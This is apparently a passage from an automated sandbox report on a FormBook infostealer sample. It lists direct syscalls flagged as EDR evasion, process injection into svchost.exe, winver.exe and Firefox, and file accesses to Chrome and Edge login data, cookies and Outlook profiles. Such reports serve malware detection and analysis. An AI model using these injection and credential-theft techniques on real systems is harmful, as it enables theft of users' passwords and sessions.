                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395EA2E mov eax, dword ptr fs:[00000030h]8_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936A50 mov eax, dword ptr fs:[00000030h]8_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940A5B mov eax, dword ptr fs:[00000030h]8_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940A5B mov eax, dword ptr fs:[00000030h]8_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039ACA72 mov eax, dword ptr fs:[00000030h]8_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039ACA72 mov eax, dword ptr fs:[00000030h]8_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396CA6F mov eax, dword ptr fs:[00000030h]8_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396CA6F mov eax, dword ptr fs:[00000030h]8_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396CA6F mov eax, dword ptr fs:[00000030h]8_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DEA60 mov eax, dword ptr fs:[00000030h]8_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B89B3 mov esi, dword ptr fs:[00000030h]8_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B89B3 mov eax, dword ptr fs:[00000030h]8_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B89B3 mov eax, dword ptr fs:[00000030h]8_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A0 mov eax, dword ptr fs:[00000030h]8_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039309AD mov eax, dword ptr fs:[00000030h]8_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039309AD mov eax, dword ptr fs:[00000030h]8_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A9D0 mov eax, dword ptr fs:[00000030h]8_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039649D0 mov eax, dword ptr fs:[00000030h]8_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FA9D3 mov eax, dword ptr fs:[00000030h]8_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C69C0 mov eax, dword ptr fs:[00000030h]8_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039629F9 mov eax, dword ptr fs:[00000030h]8_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039629F9 mov eax, dword ptr fs:[00000030h]8_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BE9E0 mov eax, dword ptr fs:[00000030h]8_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BC912 mov eax, dword ptr fs:[00000030h]8_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928918 mov eax, dword ptr fs:[00000030h]8_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928918 mov eax, dword ptr fs:[00000030h]8_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE908 mov eax, dword ptr fs:[00000030h]8_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE908 mov eax, dword ptr fs:[00000030h]8_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B892A mov eax, dword ptr fs:[00000030h]8_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C892B mov eax, dword ptr fs:[00000030h]8_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0946 mov eax, dword ptr fs:[00000030h]8_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04940 mov eax, dword ptr fs:[00000030h]8_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4978 mov eax, dword ptr fs:[00000030h]8_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4978 mov eax, dword ptr fs:[00000030h]8_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BC97C mov eax, dword ptr fs:[00000030h]8_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03956962 mov eax, dword ptr fs:[00000030h]8_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03956962 mov eax, dword ptr fs:[00000030h]8_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03956962 mov eax, dword ptr fs:[00000030h]8_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E mov eax, dword ptr fs:[00000030h]8_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E mov edx, dword ptr fs:[00000030h]8_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E mov eax, dword ptr fs:[00000030h]8_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BC89D mov eax, dword ptr fs:[00000030h]8_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930887 mov eax, dword ptr fs:[00000030h]8_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E8C0 mov eax, dword ptr fs:[00000030h]8_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A008C0 mov eax, dword ptr fs:[00000030h]8_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C8F9 mov eax, dword ptr fs:[00000030h]8_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C8F9 mov eax, dword ptr fs:[00000030h]8_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FA8E4 mov eax, dword ptr fs:[00000030h]8_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BC810 mov eax, dword ptr fs:[00000030h]8_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03952835 mov eax, dword ptr fs:[00000030h]8_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03952835 mov eax, dword ptr fs:[00000030h]8_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03952835 mov eax, dword ptr fs:[00000030h]8_2_03952835
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_005680A9
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0053A155
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053A124 SetUnhandledExceptionFilter,0_2_0053A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 7828Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\z6tNjJC614.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FA0008Jump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005687B1 LogonUserW,0_2_005687B1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00513B3A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005148D7
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00574C53 mouse_event,0_2_00574C53
                Source: C:\Users\user\Desktop\z6tNjJC614.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"Jump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00567CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00567CAF
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0056874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0056874B
                Source: z6tNjJC614.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: z6tNjJC614.exe, tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053862B cpuid 0_2_0053862B
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00544E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00544E87
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00551E06 GetUserNameW,0_2_00551E06
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00543F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00543F3A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005149A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: z6tNjJC614.exeBinary or memory string: WIN_81
                Source: z6tNjJC614.exeBinary or memory string: WIN_XP
                Source: z6tNjJC614.exeBinary or memory string: WIN_XPe
                Source: z6tNjJC614.exeBinary or memory string: WIN_VISTA
                Source: z6tNjJC614.exeBinary or memory string: WIN_7
                Source: z6tNjJC614.exeBinary or memory string: WIN_8
                Source: z6tNjJC614.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00586283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00586283
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00586747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00586747

                Mitre Att&ck Matrix

